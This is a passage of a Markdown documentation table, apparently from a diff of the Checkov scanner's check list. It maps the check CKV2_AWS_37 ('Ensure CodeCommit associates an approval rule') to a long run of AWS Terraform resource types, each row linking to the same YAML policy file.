[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 606 | CKV2_AWS_37 | resource | aws_apigatewayv2_api_mapping | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 607 | CKV2_AWS_37 | resource | aws_apigatewayv2_authorizer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 608 | CKV2_AWS_37 | resource | aws_apigatewayv2_deployment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 609 | CKV2_AWS_37 | resource | aws_apigatewayv2_domain_name | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 610 | CKV2_AWS_37 | resource | aws_apigatewayv2_integration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 611 | CKV2_AWS_37 | resource | aws_apigatewayv2_integration_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 612 | CKV2_AWS_37 | resource | 
aws_apigatewayv2_model | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 613 | CKV2_AWS_37 | resource | aws_apigatewayv2_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 614 | CKV2_AWS_37 | resource | aws_apigatewayv2_route_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 615 | CKV2_AWS_37 | resource | aws_apigatewayv2_stage | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 616 | CKV2_AWS_37 | resource | aws_apigatewayv2_vpc_link | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 617 | CKV2_AWS_37 | resource | aws_app_cookie_stickiness_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 618 | CKV2_AWS_37 | resource | aws_appautoscaling_policy | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 619 | CKV2_AWS_37 | resource | aws_appautoscaling_scheduled_action | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 620 | CKV2_AWS_37 | resource | aws_appautoscaling_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 621 | CKV2_AWS_37 | resource | aws_appmesh_mesh | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 622 | CKV2_AWS_37 | resource | aws_appmesh_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 623 | CKV2_AWS_37 | resource | aws_appmesh_virtual_node | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 624 | CKV2_AWS_37 | resource | aws_appmesh_virtual_router | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 625 | CKV2_AWS_37 | resource | aws_appmesh_virtual_service | Ensure 
CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 626 | CKV2_AWS_37 | resource | aws_appsync_api_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 627 | CKV2_AWS_37 | resource | aws_appsync_datasource | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 628 | CKV2_AWS_37 | resource | aws_appsync_function | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 629 | CKV2_AWS_37 | resource | aws_appsync_graphql_api | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 630 | CKV2_AWS_37 | resource | aws_appsync_resolver | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 631 | CKV2_AWS_37 | resource | aws_athena_database | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 632 | CKV2_AWS_37 | resource | 
aws_athena_named_query | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 633 | CKV2_AWS_37 | resource | aws_athena_workgroup | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 634 | CKV2_AWS_37 | resource | aws_autoscaling_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 635 | CKV2_AWS_37 | resource | aws_autoscaling_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 636 | CKV2_AWS_37 | resource | aws_autoscaling_lifecycle_hook | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 637 | CKV2_AWS_37 | resource | aws_autoscaling_notification | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 638 | CKV2_AWS_37 | resource | aws_autoscaling_policy | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 639 | CKV2_AWS_37 | resource | aws_autoscaling_schedule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 640 | CKV2_AWS_37 | resource | aws_backup_plan | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 641 | CKV2_AWS_37 | resource | aws_backup_selection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 642 | CKV2_AWS_37 | resource | aws_backup_vault | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 643 | CKV2_AWS_37 | resource | aws_batch_compute_environment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 644 | CKV2_AWS_37 | resource | aws_batch_job_definition | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 645 | CKV2_AWS_37 | resource | aws_batch_job_queue | Ensure CodeCommit associates an 
approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 646 | CKV2_AWS_37 | resource | aws_budgets_budget | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 647 | CKV2_AWS_37 | resource | aws_cloud9_environment_ec2 | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 648 | CKV2_AWS_37 | resource | aws_cloudformation_stack | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 649 | CKV2_AWS_37 | resource | aws_cloudformation_stack_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 650 | CKV2_AWS_37 | resource | aws_cloudformation_stack_set_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 651 | CKV2_AWS_37 | resource | aws_cloudfront_distribution | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 652 | CKV2_AWS_37 | resource 
| aws_cloudfront_origin_access_identity | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 653 | CKV2_AWS_37 | resource | aws_cloudfront_public_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 654 | CKV2_AWS_37 | resource | aws_cloudhsm_v2_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 655 | CKV2_AWS_37 | resource | aws_cloudhsm_v2_hsm | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 656 | CKV2_AWS_37 | resource | aws_cloudtrail | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 657 | CKV2_AWS_37 | resource | aws_cloudwatch_dashboard | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 658 | CKV2_AWS_37 | resource | aws_cloudwatch_event_permission | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 659 | CKV2_AWS_37 | resource | aws_cloudwatch_event_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 660 | CKV2_AWS_37 | resource | aws_cloudwatch_event_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 661 | CKV2_AWS_37 | resource | aws_cloudwatch_log_destination | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 662 | CKV2_AWS_37 | resource | aws_cloudwatch_log_destination_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 663 | CKV2_AWS_37 | resource | aws_cloudwatch_log_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 664 | CKV2_AWS_37 | resource | aws_cloudwatch_log_metric_filter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 665 | CKV2_AWS_37 | resource | 
aws_cloudwatch_log_resource_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 666 | CKV2_AWS_37 | resource | aws_cloudwatch_log_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 667 | CKV2_AWS_37 | resource | aws_cloudwatch_log_subscription_filter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 668 | CKV2_AWS_37 | resource | aws_cloudwatch_metric_alarm | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 669 | CKV2_AWS_37 | resource | aws_codebuild_project | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 670 | CKV2_AWS_37 | resource | aws_codebuild_source_credential | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 671 | CKV2_AWS_37 | resource | aws_codebuild_webhook | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 672 | CKV2_AWS_37 | resource | aws_codecommit_repository | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 673 | CKV2_AWS_37 | resource | aws_codecommit_trigger | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 674 | CKV2_AWS_37 | resource | aws_codedeploy_app | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 675 | CKV2_AWS_37 | resource | aws_codedeploy_deployment_config | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 676 | CKV2_AWS_37 | resource | aws_codedeploy_deployment_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 677 | CKV2_AWS_37 | resource | aws_codepipeline | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 678 | CKV2_AWS_37 | resource | aws_codepipeline_webhook | Ensure 
CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 679 | CKV2_AWS_37 | resource | aws_codestarnotifications_notification_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 680 | CKV2_AWS_37 | resource | aws_cognito_identity_pool | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 681 | CKV2_AWS_37 | resource | aws_cognito_identity_pool_roles_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 682 | CKV2_AWS_37 | resource | aws_cognito_identity_provider | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 683 | CKV2_AWS_37 | resource | aws_cognito_resource_server | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 684 | CKV2_AWS_37 | resource | aws_cognito_user_group | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 685 | CKV2_AWS_37 | resource | aws_cognito_user_pool | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 686 | CKV2_AWS_37 | resource | aws_cognito_user_pool_client | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 687 | CKV2_AWS_37 | resource | aws_cognito_user_pool_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 688 | CKV2_AWS_37 | resource | aws_config_aggregate_authorization | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 689 | CKV2_AWS_37 | resource | aws_config_config_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 690 | CKV2_AWS_37 | resource | aws_config_configuration_aggregator | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 691 | CKV2_AWS_37 | resource | 
aws_config_configuration_recorder | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 692 | CKV2_AWS_37 | resource | aws_config_configuration_recorder_status | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 693 | CKV2_AWS_37 | resource | aws_config_delivery_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 694 | CKV2_AWS_37 | resource | aws_config_organization_custom_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 695 | CKV2_AWS_37 | resource | aws_config_organization_managed_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 696 | CKV2_AWS_37 | resource | aws_cur_report_definition | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 697 | CKV2_AWS_37 | resource | aws_customer_gateway | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 698 | CKV2_AWS_37 | resource | aws_datapipeline_pipeline | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 699 | CKV2_AWS_37 | resource | aws_datasync_agent | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 700 | CKV2_AWS_37 | resource | aws_datasync_location_efs | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 701 | CKV2_AWS_37 | resource | aws_datasync_location_nfs | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 702 | CKV2_AWS_37 | resource | aws_datasync_location_s3 | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 703 | CKV2_AWS_37 | resource | aws_datasync_location_smb | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 704 | CKV2_AWS_37 | resource | aws_datasync_task | Ensure CodeCommit 
associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 705 | CKV2_AWS_37 | resource | aws_dax_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 706 | CKV2_AWS_37 | resource | aws_dax_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 707 | CKV2_AWS_37 | resource | aws_dax_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 708 | CKV2_AWS_37 | resource | aws_db_cluster_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 709 | CKV2_AWS_37 | resource | aws_db_event_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 710 | CKV2_AWS_37 | resource | aws_db_instance | Ensure CodeCommit associates an approval rule | Terraform | 